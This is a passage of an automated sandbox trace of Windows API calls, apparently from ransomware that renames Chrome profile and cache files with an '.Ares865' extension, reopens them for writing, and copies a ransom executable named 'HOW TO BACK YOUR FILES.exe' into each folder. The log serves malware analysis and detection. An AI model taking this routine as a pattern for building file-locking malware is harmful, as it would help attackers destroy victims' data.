dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.067] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16) returned 1 [0104.072] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK.Ares865") returned 118 [0104.072] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\lock"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\lock.ares865"), dwFlags=0x1) returned 1 [0104.074] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOCK.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\lock.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.074] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0104.074] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0104.074] CloseHandle (hObject=0x0) returned 0 [0104.074] CloseHandle (hObject=0x118) returned 1 [0104.074] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x802d66a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x802d66a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9ab9e110, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xa7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LOG", cAlternateFileName="")) returned 1 [0104.074] lstrcmpiW (lpString1="LOG", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0104.074] lstrcmpiW (lpString1="LOG", lpString2="aoldtz.exe") returned 1 [0104.075] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG.Ares865") returned 117 [0104.075] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log.ares865"), dwFlags=0x1) returned 1 [0104.076] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\LOG.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.076] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=167) returned 1 [0104.079] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001.Ares865") returned 129 [0104.079] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\manifest-000001"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\manifest-000001.ares865"), dwFlags=0x1) returned 1 [0104.081] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\MANIFEST-000001.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\manifest-000001.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.081] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=41) returned 1 [0104.085] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache" [0104.085] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache" [0104.085] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.085] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.086] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.086] GetLastError () returned 0x0 [0104.086] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.086] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f3e2080, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f3e2080, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.086] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.086] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.087] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\data_0.Ares865") returned 97 [0104.087] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\data_0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cache\\data_0"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\data_0.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cache\\data_0.ares865"), dwFlags=0x1) returned 1 [0104.091] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\data_0.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cache\\data_0.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.091] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=45056) returned 1 [0104.097] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\data_1.Ares865") returned 97 [0104.097] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\data_1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cache\\data_1"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\data_1.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cache\\data_1.ares865"), dwFlags=0x1) returned 1 [0104.098] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\data_1.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cache\\data_1.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.099] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=270336) returned 1 [0104.114] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\data_2.Ares865") returned 97 [0104.115] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\data_2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cache\\data_2"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\data_2.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cache\\data_2.ares865"), dwFlags=0x1) returned 1 [0104.116] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\data_2.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cache\\data_2.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.116] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0104.121] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\data_3.Ares865") returned 97 [0104.121] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\data_3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cache\\data_3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\data_3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cache\\data_3.ares865"), dwFlags=0x1) returned 1 [0104.122] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\data_3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cache\\data_3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.123] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4202496) returned 1 [0104.228] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\index.Ares865") returned 96 [0104.228] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\index" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cache\\index"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\index.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cache\\index.ares865"), dwFlags=0x1) returned 1 [0104.230] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Cache\\index.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\cache\\index.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.230] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=524656) returned 1 [0104.264] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad" [0104.264] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad" [0104.264] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.264] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\crashpad\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.265] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.265] GetLastError () returned 0x0 [0104.265] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.265] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f4081e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f4081e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.265] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.265] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.266] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad\\metadata.Ares865") returned 94 [0104.266] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad\\metadata" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\crashpad\\metadata"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad\\metadata.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\crashpad\\metadata.ares865"), dwFlags=0x1) returned 1 [0104.269] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad\\metadata.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\crashpad\\metadata.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.269] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0104.269] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0104.269] CloseHandle (hObject=0x0) returned 0 [0104.269] CloseHandle (hObject=0x118) returned 1 [0104.269] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f4081e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f4081e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="reports", cAlternateFileName="")) returned 1 [0104.269] lstrcmpiW (lpString1="reports", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0104.269] lstrcmpiW (lpString1="reports", lpString2="aoldtz.exe") returned 1 [0104.269] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad\\settings.dat.Ares865") returned 98 [0104.270] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad\\settings.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\crashpad\\settings.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad\\settings.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\crashpad\\settings.dat.ares865"), dwFlags=0x1) returned 1 [0104.271] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad\\settings.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\crashpad\\settings.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0104.271] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=40) returned 1 [0104.276] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad\\reports", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad\\reports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad\\reports" [0104.276] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad\\reports" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad\\reports") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad\\reports" [0104.276] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.276] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad\\reports\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\crashpad\\reports\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.277] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.277] GetLastError () returned 0x0 [0104.277] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.277] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Crashpad\\reports\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7f598c40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f4081e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f4081e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.277] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.277] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.277] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\CertificateTransparency", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\CertificateTransparency") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\CertificateTransparency" [0104.277] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\CertificateTransparency" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\CertificateTransparency") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\CertificateTransparency" [0104.278] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.278] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\CertificateTransparency\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\certificatetransparency\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.278] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.278] GetLastError () returned 0x0 [0104.279] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.279] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\CertificateTransparency\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x81dfb250, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f4081e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4f4081e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.279] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.279] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.279] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Deployment", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Deployment") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Deployment" [0104.279] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Deployment" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Deployment") returned="C:\\Users\\5p5NrGJn0jS 